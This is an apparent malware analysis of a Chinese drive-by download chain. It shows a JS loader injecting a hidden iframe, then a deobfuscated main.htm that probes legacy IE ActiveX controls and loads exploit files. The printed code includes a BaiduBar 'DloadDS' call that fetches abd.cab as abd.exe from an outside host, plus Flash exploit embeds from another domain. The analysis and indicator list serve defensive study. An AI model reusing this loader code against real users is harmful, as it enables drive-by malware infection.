my.stsw5178.cn/1.js

Content of this JS

// Stage-1 loader served from my.stsw5178.cn/1.js (analysis notes; code left verbatim).
// Sets the browser status-bar text to "完毕" ("finished") — cosmetic, plausibly meant to
// make the page look as though it has finished loading normally.
window.status = "完毕";
// Injects a 2x2 (effectively invisible) iframe pointing at the stage-2 page on a second
// domain, c.liuliang000.com. Because it is a document.write at parse time, the iframe is
// created as soon as 1.js is included — no user interaction is needed.
document.write("<iframe src=http://c.liuliang000.com/wending09.htm width=2 height=2></iframe>");

Content of wending09.htm

<!-- Stage-2 page (wending09.htm); analysis notes, markup left verbatim. -->
<!-- Zero-height iframe that pulls in main.htm (the ActiveX/Flash probe loader) relative to this page. -->
<iframe src=main.htm width=10 height=0></iframe>
<!-- External script from js.users.51.la — appears to be a third-party visitor counter (51.la),
     presumably used by the operator to track hits; confirm before treating the domain itself as malicious. -->
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1937043.js"></script>

The decoded JS content for main.htm is
/*
 * Deobfuscated drive-by loader served as main.htm (analysis notes; code left verbatim).
 *
 * Structure: a chain of try/catch/finally probes. Each try{} instantiates an ActiveX
 * control; the finally{} then compares the catch variable with the string
 * "[object Error]" to decide whether the probe succeeded. In a standards-compliant
 * engine the catch parameter shadows the outer `var e`/`f`/`g`/`h`/`i`, so the outer
 * variable stays undefined and the `!= "[object Error]"` test would always be true;
 * the logic only works as intended where the catch binding leaks into the enclosing
 * scope (historically the case in IE's JScript). Likewise `catch(e){};finally{` — a
 * `;` between catch and finally — is a syntax error for a standards-compliant parser,
 * presumably tolerated by the IE engine this page targeted. TODO confirm against the
 * JScript version in question before reusing these notes for detection logic.
 *
 * Probes, in order (2-5 are in the else branch, i.e. run only when probe 1 fails):
 *  1. Creates an <object>; unless the UA contains "msie 7", sets its classid to
 *     BD96C556-65A3-11D0-983A-00C04FC29E36, then calls createobject("Adodb.Stream","").
 *     Success -> document.write of <script src=014.js> (same origin; payload not shown).
 *     The CLSID is the one widely associated with the MDAC RDS.DataSpace control — verify.
 *  2. ShockwaveFlash.ShockwaveFlash.9: reads GetVariable("$version"), splits on ",",
 *     and unless the third field (index 2) is "124" or "60" embeds
 *     http://swf.4w4w4w.com/swf/<field>.swf — the SWF is chosen per Flash build;
 *     the two excluded builds are presumably ones the author had no working file for.
 *  3. "\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31" decodes to
 *     "GLIEDown.IEDown.1"; if instantiable, writes a display:none iframe to lz.htm (not shown).
 *  4. IERPCtl.IERPCtl.1 (RealPlayer): if PlayerProperty("PRODUCTVERSION") <= "6.0.14.552"
 *     loads rl.js (not shown). This is a plain string comparison, not a numeric version
 *     compare, so it is only approximately an "at or below this version" check.
 *  5. BaiduBar.Tool: "\x44\x6c\x6f\x61\x64\x44\x53" decodes to "DloadDS"; it is invoked
 *     with ("http://xia.9w9w9w.com/down/abd.cab", "abd.exe", 0). The method name suggests
 *     a download helper that fetches the remote .cab as abd.exe; whether it also executes
 *     it is not visible here.
 *
 * Indicators visible in this snippet: swf.4w4w4w.com, xia.9w9w9w.com, the same-origin
 * files 014.js, lz.htm, rl.js, and the CLSID/ProgIDs listed above. The mixed-case
 * `<sCrIpT LAnGuAgE="jAvAsCrIpT"...>` tag is a simple signature-evasion trick.
 * `var a="%dfdf%%D$F^D%SF&DS"` is never read — dead data, likely filler/obfuscation.
 */
try{var e;var ado=(document.createElement("object"));if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){var a="%dfdf%%D$F^D%SF&DS";document.write("<script src=014.js><\/script>")}else{try{var f;var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",")}catch(f){};finally{if(f!="[object Error]"&&Flashver[2]!="124"&&Flashver[2]!="60"){document.write('<embed src="http://swf.4w4w4w.com/swf/'+Flashver[2]+'.swf"></embed>')}}try{var g;var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31")}catch(g){};finally{if(g!="[object Error]"){document.write('<iframe style=display:none src="lz.htm"></iframe>')}}try{var h;var real=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(h){};finally{if(h!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=rl.js><\/script>')}}}try{var i;var Baidu=new ActiveXObject("BaiduBar.Tool")}catch(i){};finally{if(i!="[object Error]"){Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xia.9w9w9w.com/down/abd.cab","abd.exe",0)}}}}
As can be seen, some of the exploit components are fetched from hosts other than the page itself: the per-build Flash files from swf.4w4w4w.com and the abd.cab payload from xia.9w9w9w.com, while 014.js, lz.htm and rl.js are loaded relative to main.htm on c.liuliang000.com.
